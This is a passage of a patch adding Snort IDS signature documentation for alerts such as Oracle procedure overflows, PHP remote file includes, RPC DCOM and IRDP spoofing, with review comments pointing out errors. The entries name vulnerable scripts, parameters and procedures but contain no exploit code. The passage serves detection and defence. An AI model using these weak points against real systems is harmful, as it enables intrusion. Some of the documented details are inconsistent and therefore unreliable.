+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
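Review bot: this file is identical to 1703.txt above, including the empty Affected Systems section and the missing full stops; if sids 1055 and 1703 match different traversal patterns or protocols, each Summary should say so. The same fixes apply here: fill in Affected Systems, drop the comma in "technique, to browse", and remove the trailing space on the "-- " separator.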
--- /dev/null
+++ b/doc/signatures/1683.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1683
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
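Review bot: Attack Scenarios ("Simple. These are Oracle database commands.") duplicates the Ease of Attack answer and describes no scenario; it should say how the command reaches the server, for instance through an exposed listener port as the ORACLE_PORTS discussion under False Negatives implies. The sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" reads as leftover from a telnet signature and does not fit an Oracle listener rule; the Affected Systems section present in every other document is missing here; and the second Corrective Action sentence lacks a terminating period.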
--- /dev/null
+++ b/doc/signatures/995.txt
@@ -0,0 +1,63 @@
+Rule
+
+--
+Sid:
+995
+
+
+--
+Summary:
+This event is generated when an attempt is made to request an HTTP-based password change.
+
+--
+Impact:
+Information gathering/remote access.  Error messages from failed password changes can indicate whether a given account exists on the server.  Successful password changes can allow remote access to the server. 
+
+--
+Detailed Information:
+Microsoft Internet Information Services (IIS) Version 4 servers that were upgraded from IIS 2 or 3 have a legacy ism.dll file that allows web-based administration.  Upon sending a request to ism.dll, the user will be prompted for a userid and password.  An attacker can attempt to brute force guess a password, allowing remote access to the server.
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0 servers upgraded from IIS 2.0 or 3.0
+
+--
+Attack Scenarios:
+An attacker can request password changes to discover existing accounts or brute force password changes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of ISS.
+
+Consider running the IIS Lockdown Tool to disable unnecessary functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1538
+
+Bugtraq
+http://www.securityfocus.com/bid/189
+
+--
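Review bot: "Upgrade to a more current version of ISS." under Corrective Action should read "IIS", the product named in Detailed Information; ISS is a different vendor documented elsewhere in this patch, so the typo is actively misleading. Also "Rule" on the first line lacks the colon used by the other files, and the Summary ("an HTTP-based password change") is vaguer than Detailed Information, which names the ism.dll request; the Summary should mention ism.dll so the reader knows what the rule matches.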
--- /dev/null
+++ b/doc/signatures/3423.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3423
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
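Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") contradicts Detailed Information, which says the trigger is a malformed DCOM request to an RPC port; one of the two should be corrected so the scenario matches the described overflow. "Expoit" under Ease of Attack is a typo for "Exploit", and Additional References is empty although Detailed Information calls this a known vulnerability, so the vendor bulletin for the issue should be listed there.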
--- /dev/null
+++ b/doc/signatures/1092.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1092
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
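Review bot: the body of this file is identical to the visible tail of the traversal document immediately above it except for the Sid, and Affected Systems is again empty; since several SIDs share this text, each document should at least state the traversal pattern or protocol (web or ftp) its rule inspects, otherwise an analyst cannot tell why a particular SID fired rather than another. Additional References is empty and there are two blank lines before the closing separator.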
--- /dev/null
+++ b/doc/signatures/2481.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a service via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a service
+on a system using SMB across the network.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may try to deny services to other users.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
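Review bot: the Sid field reads 2176 but the file is doc/signatures/2481.txt; one of the two is wrong, and the mismatch will break any lookup that maps a SID to its documentation file. Impact ("Serious.") gives no description of what shutting down a service via SMB actually affects, and the "Turn off file and print sharing on the target host" advice under Corrective Action is not viable for a file server, so it should be qualified (for example, where the shares are not required).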
--- /dev/null
+++ b/doc/signatures/100000609.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000609
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_bad_delete.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_bad_delete.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
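Review bot: the separator lines directly after "100000609", after "All systems running CGI applications using Indexu" and after the contributor list lack the blank line that precedes "--" everywhere else in this patch, so the file will not parse consistently with the other documents. "ona web server" in Detailed Information should be "on a web server", and "an exploitation attempt has been attempted" in the Summary is redundant ("an exploitation attempt has been made"). Corrective Action lists only patching; for a remote file include in a PHP application it could also recommend disabling remote URL includes in the interpreter's configuration.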
--- /dev/null
+++ b/doc/signatures/100000385.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000385
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ottoman" application running on a webserver. Access to the file "error.php" using a remote file being passed as the "default_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "default_path" parameter in the "error.php" script used by the "Ottoman" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ottoman
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
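Review bot: the third paragraph of Detailed Information and the Attack Scenarios text describe an authentication bypass ("validating the credentials of a client host", "supply his/her own credentials") rather than the remote file include the Summary describes; this boilerplate should be replaced with a scenario that matches the first paragraph, i.e. a URL supplied in the "default_path" parameter causing error.php to include a remote file. The two blank lines before "Rule:" at the top of the file and "ona web server" in Detailed Information should also be fixed.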
--- /dev/null
+++ b/doc/signatures/653.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+653
+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
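Review bot: Affected Systems says "Any software running on x86 architecture", yet Attack Scenarios describes only a DCERPC/Microsoft Workstation service overflow; the scenario should be generic, or the rule's specific target stated, so the two sections agree. "instrucions" in Detailed Information is a typo for "instructions", and Impact ("Denial of Service (DoS) possible execution of arbitrary code") needs a separator between the two outcomes. Since False Positives already notes binary file transfers, Corrective Action could add that the event should be correlated with the destination service and other events from the same source before acting on it.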
--- /dev/null
+++ b/doc/signatures/1853.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1853
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Trinoo DDoS Trojan server.
+
+--
+Impact:
+Possible Distributed Denial of Service.
+
+--
+Detailed Information:
+This Trojan affects Windows and Linux operating systems:
+
+Trinoo is used as a Distributed Denial of Service (DDoS) agent and can 
+launch DDoS attacks from a large number of hosts against a target.
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
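Review bot: Corrective Action ("Disallow Telnet access from external sources", "Use SSH as opposed to Telnet") does not relate to anything in Detailed Information, which never mentions Telnet; the text should state which port or protocol the Trinoo server connection uses, and the mitigation should address that traffic and the removal of the agent. The Affected Systems section is missing even though Detailed Information names Windows and Linux, the first sentence of Detailed Information ends with a colon instead of a period, and "when  an attacker" in the Summary has a doubled space.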
--- /dev/null
+++ b/doc/signatures/402.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+Sid:
+402
+
+--
+Summary:
+This event is generated when an ICMP Port Unreachable message was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+An ICMP Port Unreachable is not an attack, but may indicate that the source
+of the packet was the target of a scan or other malicious activity.
+
+An ICMP Port Unreachable (ICMP type 3 code 3) indicates that someone or
+something tried to connect to a port on a system that was not available
+(i.e., no service was running on that port).
+
+This is analagous to RST packets in TCP.  Since UDP does not have an
+equivalent, it relies upon ICMP Port Unreachable for this. This often
+indicates someone was scanning for UDP services.
+
+--
+Affected Systems:
+	All systems
+ 
+--
+Attack Scenarios:
+An attacker may use a port scanner to determine possible attack vectors
+as a prelude to a directed attack against a system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+This kind of packet is common on networks, and may be generated by simple
+misconfigurations on either the source or destination, or service outage.
+
+--
+False Negatives:
+Not all operating systems will respond with ICMP Port Unreachable
+messages when no service is running.
+
+--
+Corrective Action:
+Examine the activity of the recipient of this packet to see if the
+recipient was responsible for scanning or other behavior.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+RFC 792:
+http://www.faqs.org/rfcs/rfc792.html
+
+--
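Review bot: Ease of Attack ("Simple.") conflicts with Detailed Information's statement that "An ICMP Port Unreachable is not an attack"; it should say that the message itself is a response and that the rating applies to the UDP scan that typically elicits it. "analagous" should be "analogous", "unkown" under Contributors should be "unknown", the Summary should read "is detected" rather than "was detected", and the final heading "References:" differs from "Additional References:" used by the other files.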
--- /dev/null
+++ b/doc/signatures/2749.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2749
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_delete_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
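Review bot: the sentence naming the procedure comment_on_delete_resolution is broken by a line break before ". This procedure is included in dbms_repcat.", which looks like a template substitution that was never cleaned up; join it into one sentence. "Oracle Oracle9i" under Affected Systems repeats the vendor name, Corrective Action lacks a terminating period, and Additional References is empty although the Summary calls this a known vulnerability.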
--- /dev/null
+++ b/doc/signatures/1096.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1096
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
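Review bot: the Summary, Detailed Information and Attack Scenarios are entirely generic ("Many known vulnerabilities exist ... the attack scenarios are legion") and never say what request pattern SID 1096 matches, so an analyst cannot distinguish this event from any other web rule; the document should name the specific URI or string the rule inspects. "attackers choosing" under Impact should be "attacker's choosing".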
--- /dev/null
+++ b/doc/signatures/100000728.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000728
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "functions.inc" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "functions.inc" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
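Review bot: the parameter named in the Summary, "$_CONF[path]", is a PHP configuration-array variable rather than an ordinary request parameter, so the document should explain how a request can set it (the text currently reads as if it were a normal query-string parameter), otherwise the Corrective Action cannot be targeted. The separator lines directly after "100000728", after "All systems running CGI applications using Geeklog" and after the contributor list lack the blank line used elsewhere, and "ona web server" should be "on a web server".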
--- /dev/null
+++ b/doc/signatures/526.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid: 526
+
+--
+Summary:
+This event is generated when SYN packets contain data greater than what 
+is normally expected.
+
+--
+Impact:
+Possible Denial of Service attack (DoS) or IDS evasion.
+
+--
+Detailed Information:
+Under normal circumstances TCP SYN packets are exchanged between hosts 
+to synchronize the TCP sequence numbers in a transaction. A SYN packet 
+with a datagram size larger than 6 bytes may be an indication of a 
+Denial of Service attack or an attempt to evade IDS.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	Any
+
+--
+Attack Scenarios:
+The attacker would need to send specially crafted packets with the SYN 
+flag set with a datagram size larger than 6 bytes. This may be achieved 
+using a script or tool.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/incident_notes/IN-99-07.html
+
+--
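Review bot: the paragraph starting "an indicator of unauthorized network use, reconnaisance activity or system compromise." begins mid-sentence; its lead-in was lost and the fragment should be rejoined with whatever sentence introduced it (it also misspells "reconnaissance"). Corrective Action is empty; at minimum it should direct the analyst to examine the SYN payload and correlate with other events from the same source. Detailed Information's threshold ("larger than 6 bytes") should also state what the 6 bytes refers to, so the reader can verify the rule's condition against a packet capture.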
--- /dev/null
+++ b/doc/signatures/2852.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2852
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure generate_mview_support
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
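Review bot: same defects as the 2749.txt document above: the line break before ". This procedure is included in dbms_repcat." splits the sentence naming generate_mview_support, "Oracle Oracle9i" repeats the vendor, Corrective Action lacks a period, and Additional References is empty. Since the two files differ only in the procedure name, consider generating them from one corrected template so the fixes land in both.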
--- /dev/null
+++ b/doc/signatures/364.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+364
+
+--
+Summary:
+This event is generated when an external server sends an ICMP IRDP router advertisement message to an internal server. This may indicate an attempt to cause a denial of service by adding spoofed router information to an IRDP-enabled host's routing table.
+
+--
+Impact:
+Denial of service. 
+
+--
+Detailed Information:
+The ICMP Router Discovery Protocol (IRDP) is enabled by default on some Microsoft Windows and Sun Solaris operating systems. IRDP messages broadcast network routing information, and computers with IRDP enabled will store this routing information in their default routing tables. There is no way to determine whether the IRDP broadcast is authentic or spoofed, and some hosts will use the routes that appear in their local routing tables before using routes discovered via DHCP.
+
+An attacker can exploit this behavior by broadcasting IRDP messages with erroneous routing information to a target network. This will cause some IRDP-enabled hosts on that network to route traffic through the route advertised in the spoofed IRDP message. If the spoofed IRDP message contains nonexistent/inaccessible routing addresses, the target will not be able to connect to external networks, causing a denial of service. This may also facilitate man-in-the-middle attacks or interception of data by an attacker.
+
+Note that if an attacker is on the internal network, he/she can use valid routing addresses in the spoofed IRDP messages to passively monitor other machines or to perform "man-in-the-middle" attacks.
+
+--
+Affected Systems:
+Microsoft Windows 95
+Microsoft Windows 98
+Microsoft Windows 98SE
+Sun Solaris 2.6
+
+--
+Attack Scenarios:
+An attacker crafts spoofed IRDP broadcast messages and forwards them to a target network. If the messages are not filtered by the firewall and are broadcast to the internal network, some IRDP-enabled hosts begin routing traffic through the routes advertised in the IRDP broadcast message, which can cause a denial of service condition.
+
+--
+Ease of Attack:
+Simple. A proof-of-concept exists.
+
+--
+False Positives:
+This rule may generate an alert if legitimate ICMP traffic of type 10 is sent from an external server to an internal server.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+For vulnerable Windows computers, disable IRDP on the vulnerable system (see http://support.microsoft.com/support/kb/articles/q216/1/41.asp).
+
+For vulnerable Solaris 2.6 computers, install the patch provided by Sun (see http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-access).
+
+Use a packet filtering firewall to block ICMP type 9 packets from entering the internal network.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>.
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0875
+
+Arachnids:
+http://www.whitehats.com/info/IDS174
+
+Bugtraq:
+http://www.securityfocus.com/bid/578
+
+RFC:
+http://www.cotse.com/CIE/RFC/Orig/rfc1256.txt
+
+--
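Review bot: False Positives refers to "legitimate ICMP traffic of type 10" while Corrective Action tells the reader to block "ICMP type 9 packets"; the Summary describes router advertisements, which RFC 1256 (cited under Additional References) defines as ICMP type 9, with type 10 being router solicitations, so the False Positives line should say type 9. The Microsoft and Sun support URLs under Corrective Action are unlikely to resolve any longer and should be checked or replaced with the vendors' current knowledge-base locations.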
--- /dev/null
+++ b/doc/signatures/2402.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2402
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISS RealSecure and BlackICE products.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the ISS Analysis Module can be triggered
+by an attacker sending a single SMB packet containing an AccountName
+greater than 300 bytes. It is possible for an attacker to exploit this
+condition by sending a specially crafted packet to a host serving network shares.
+
+When the systems running one of the affected ISS products decodes the
